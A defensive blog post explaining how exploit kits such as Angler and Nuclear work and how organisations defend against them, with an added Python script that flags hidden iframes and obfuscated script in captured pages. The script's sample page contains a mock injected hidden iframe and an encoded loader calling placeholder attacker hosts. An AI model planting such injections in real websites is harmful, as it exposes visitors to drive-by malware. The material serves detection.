Exploit Kits (EK's) are a serious cyber threat today, estimated to be responsible for a large share of malware infections worldwide. Exploit Kits are currently distributed through both public and underground sources. They appeal to a wide range of audiences, from inexperienced hackers to black hat cybercriminals. They create a fast-growing online threat, which targets holes in the everyday software used by billions of people. Criminals embed their packages of malicious code in everything they can, from shopping to news sites. Examples of the most common Exploit Kits today are Angler and Nuclear:
- Angler Exploit Kit (EK) – This kit was first identified in 2013 and gained traction because of its role in spreading ransomware, malvertising and even hacktivism campaigns. In an article published by Cisco in 2015, the Angler kit was reported to generate $60M annually from ransomware alone. (Cisco Talos Threat Intelligence)
- Nuclear Exploit Kit – This kit has evolved constantly since it first appeared in 2009. More recently, Locky ransomware has been identified as being delivered via the Nuclear Exploit Kit. Nuclear EK has also been offered under a malware-as-a-service business model.
First, What's Exploitation?
An exploit is malformed data processed by a legitimate application; it takes advantage of a vulnerability in that application and allows the attacker to run malicious code. When an exploit forces the program to behave unexpectedly, an attacker can leverage the disruption to perform other actions, usually malicious, which would not normally be permitted. For example, an attacker might exploit a program in such a way that a second program is silently installed without the user's consent or knowledge. When a program is unable to deal with an exploit because of an underlying flaw in its coding or implementation, that flaw is known as a vulnerability. For an exploit to be dangerous, an attacker must have a way to deliver it to the vulnerable program. A common threat vector is delivery via email, e.g. a Word attachment with macros. The automatic impulse of most users when they see a warning about enabling macros is to click Yes. In a nutshell, the EK “tricks” a legitimate application into running the attacker’s code.
What's an Exploit Kit?
Exploit Kits (EK's) are programs designed by cyber criminals to find flaws, weaknesses, vulnerabilities or simply mistakes in software development. The kits infect the software with malware or provide access to a system or a network. These tool kits exploit client-side vulnerabilities, typically targeting the web browser or other programs that a website can invoke (e.g. Adobe Reader, Java Runtime, Adobe Flash Player). EK's are also designed to download malicious files and inject malicious code into the system after infiltrating it. EK's include many commands that can make a system behave abnormally, including interrupting software or hardware execution, among other tricks. Once a system vulnerability has been exploited, the kit opens a channel of communication with a command and control (C&C) server. After a connection is established, the attacker may issue instructions to download additional malware or move laterally within the victim's network in search of higher-value targets. Exploit Kits are deployed in the first stage of a malware attack and play a very important role in the success rate of these attacks.
The Exploitation Process
EK's come with pre-written exploit code that targets users running insecure or unpatched software applications. While the process of being exploited by one of these kits varies, the procedure usually goes a bit like this:
- Contact the victim: A victim visits a website whose server has been compromised. This can also happen via phishing, where the user receives a link via email and is redirected to the attacker's landing page.
- Redirect to landing page: The victim is redirected through various intermediary servers. This step can take place via phishing email or malvertising. For web server compromises, the attack typically uses an iframe that has been inserted into the HTML code of the website. Because a plain iframe could be detected by a traditional AV, the bad guys use obfuscation techniques to avoid detection.
- Profile the victim: The victim lands at a rogue server hosting the EK. In this stage, the victim's system is scanned to detect whether the web browser, plugins or OS are vulnerable to exploitation. The attacker can even profile victims by attributes such as country, to single out those who might be more vulnerable.
- Deliver the payload: The Exploit Kit gathers information on the victim and determines the exploit to deliver. If the exploit succeeds, a malicious payload (a custom malware program) is downloaded to the victim’s computer and executed. Game Over!
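The redirect stage above hinges on an iframe injected into a compromised page's HTML, usually sized or styled so the visitor never sees it and often wrapped in obfuscated script. The Python script below is an added example, not code from the original post, showing the defender's side of that stage: a triage pass over a captured copy of a page that flags frames hidden from the user and script blocks carrying common encoding wrappers. The sample page, its hostnames and the `audit_html` / `InjectionAuditor` names are all constructed for this example.

```python
"""Triage helper: flag hidden iframes and obfuscated script in a captured HTML page.

Added example (not tooling from the original post). The sample page at the
bottom is constructed and its hostnames are placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# CSS tricks commonly used to keep an injected frame out of sight.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I
)
# Script constructs that often wrap an encoded redirect; presence is a signal, not a verdict.
OBFUSCATION = re.compile(r"unescape\s*\(|String\.fromCharCode|eval\s*\(", re.I)


def _is_tiny(value):
    """True for dimensions such as '0', '1' or '1px' (a frame nobody is meant to see)."""
    digits = re.sub(r"[^0-9]", "", value or "")
    return digits != "" and int(digits) <= 1


class InjectionAuditor(HTMLParser):
    """Collects findings for hidden iframes and for scripts carrying obfuscation markers."""

    def __init__(self, page_host=None):
        super().__init__()
        self.page_host = page_host   # host the page was fetched from, for off-site checks
        self.findings = []
        self._script_buf = None      # list while inside <script>, otherwise None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            reasons = []
            if _is_tiny(a.get("width")) or _is_tiny(a.get("height")):
                reasons.append("tiny dimensions")
            if HIDDEN_STYLE.search(a.get("style", "")):
                reasons.append("hidden via CSS")
            if reasons:
                src_host = urlsplit(a.get("src", "")).hostname
                self.findings.append({
                    "kind": "iframe",
                    "line": self.getpos()[0],
                    "src": a.get("src", ""),
                    "offsite": bool(self.page_host and src_host and src_host != self.page_host),
                    "reasons": reasons,
                })
        elif tag == "script":
            self._script_buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as data; collect them until the closing tag.
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            text = "".join(self._script_buf)
            self._script_buf = None
            markers = sorted(set(OBFUSCATION.findall(text)))
            if markers:
                self.findings.append({
                    "kind": "script",
                    "line": self.getpos()[0],
                    "markers": markers,
                    "snippet": text.strip()[:80],
                })


def audit_html(html, page_host=None):
    """Parse one page and return its findings; an empty list means nothing was flagged."""
    auditor = InjectionAuditor(page_host)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample: a normal video embed, an injected 1x1 hidden frame pointing
# off-site, one script using an encoded document.write, and one harmless script.
SAMPLE_HTML = """<html><body>
<h1>Example store</h1>
<iframe src="https://videos.example.com/embed/42" width="640" height="360"></iframe>
<iframe src="http://redirector.example.invalid/in.php" width="1" height="1"
        style="visibility:hidden"></iframe>
<script>document.write(unescape("%3Cscript src=%22http://landing.example.invalid/%22%3E"));</script>
<script>var cart = [];</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit_html(SAMPLE_HTML, page_host="shop.example.com"):
        print(finding)
```

These are heuristics for analyst review, not a verdict: 1x1 frames are also used by legitimate tracking pixels, so the useful workflow is to diff findings against a known-good copy of the site and treat off-site, hidden frames that are new as the ones to investigate first.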
The last step involves the payload, which is classified as a drive-by download, since it happens without the victim’s knowledge. Drive-by attacks have been used to deliver malware for many years, often in the form of an email message or popup window. The exploits from these kits can be launched when visiting legitimate websites, so users are less likely to see the attack coming.
Why Are Exploit Kits a Concern?
Exploit kits have become one of the more prevalent threats today because they are essentially crimeware. In other words, they are specialized utility programs offered for sale (or rent) by their creators to interested third parties in various cyber crime oriented forums. Cyber crime is no longer the occupation of a limited group of people with deep technical skills. Today, with the advance of EK's, less technically savvy attackers have found a relatively easy way to attack and infect a large number of users. Some exploit kits, like Angler, even come with a user-friendly interface, which enables the attacker to track the evolution of their malware campaigns and adjust the settings for more effective results. Unlike previous forms of malware, which tended to be operated by only a small number of attackers, crimeware can be used by anyone who is able to purchase the “product,” making the potential pool of attackers much larger. Since new exploits can simply be added to an EK's arsenal (just like normal software updates), attackers can also keep using the same tool (with the appropriate updates) over a longer period of time. Conversely, single-focus malware tends to have a shorter lifespan. Long story short, if you have some cash in your hands and some basic skills, you can easily get hold of an Exploit Kit on the underground web (which I strongly advise against). The purpose of this post is to show how exploit kits have become a real concern for us as defenders and for organizations struggling to protect their assets.
Why are Exploit Kits Effective?
Exploit Kits are no different from any other software that needs to be updated over time. Improving the EK is part of the “product lifecycle.” It is a critical part because, as vendors patch their software to correct vulnerabilities, EKs evolve to find new exploitable holes in the vendors' software. Let’s not forget that EK developers are after making as much money as they can in the shortest time possible. Like any business that intends to generate revenue, they need constant product development, and lots of money goes into making the kits better. The Angler EK has become more popular because its developers are able to add exploits for new vulnerabilities at a very fast pace. By the time a zero-day vulnerability is discovered, Angler already has it integrated, especially when it comes to Flash exploits. This is big business, with millions of dollars in revenue, and it is definitely reflected in the sophistication of the EK's.
What do We do About It?
It's well known that anti-virus software alone is not enough to protect organizations and end-users from advanced threats. Traditional anti-viruses are unable to provide 100% protection. No security solution can. The most sophisticated EK's are designed to detect and bypass antivirus solutions, and that’s one of the many reasons antiviruses have become ineffective. Antiviruses still have their place working against some executable malware types, as long as the manufacturers are quick enough to discover it in the wild, develop a signature and push it down to all endpoint customers, which is not always possible. To be clear, I'm not advocating that anyone stop using a traditional antivirus. Many products do a very good job at detecting known threats. The first stage of a cyberattack typically takes advantage of vulnerabilities in endpoint software. Making every possible effort to protect against this stage is the ideal place to start. The obvious defense is performing regular patching, especially of users’ browsers, plugins and OS's. At the very least, this helps reduce the window in which an attacker can use an exploit before a patch is released and the organization can roll it out. This may help reduce the attack surface, but it won’t guarantee protection against zero-day vulnerabilities. Augmentation has become a buzzword when we talk about endpoint security. I've heard from many that their antivirus solution is working when it comes to preventing known threats. I agree in some cases. Others state that they've kept their antivirus because of compliance requirements, such as PCI. The main issue has been unknown threats delivered via executable malware and EK's. Some recommend an augmentation approach to complement or cover the gap left by the traditional antivirus.
Augmentation means that an additional layer of security, focused on preventing unknown (and sometimes known) executable and EK-type attacks, is put in place. The so-called “next generation endpoint solutions” are the ones focusing on covering this hole. Many are “signatureless,” which makes the solution extremely lightweight for a better user experience. Some organizations feel that what was initially an augmentation can now be a replacement for their traditional AV. See one of my posts about the many approaches adopted by security companies to combat this and other threats: Endpoint Protection: The first line of defense.
Applying a defense-in-depth approach starting at the endpoint level is key to preventing a number of threats. Finally, educate and get educated. While technological defenses can be successful at protecting the endpoint, education is probably the most powerful defense you can apply. Users should know how to identify malicious emails and know never to click on unknown links or attachments. Web browsing education is also important, to ensure that all company staff are aware of relevant policies regarding acceptable web browsing. Limiting browsing to sites that are relevant to company business can drastically lower the chances of exposure to sites hosting EK's. That said, even the most security-conscious user can fall victim to an Exploit Kit. If this does occur, users should be made aware of the channels for reporting a suspected malware infection. Stay Safe!!!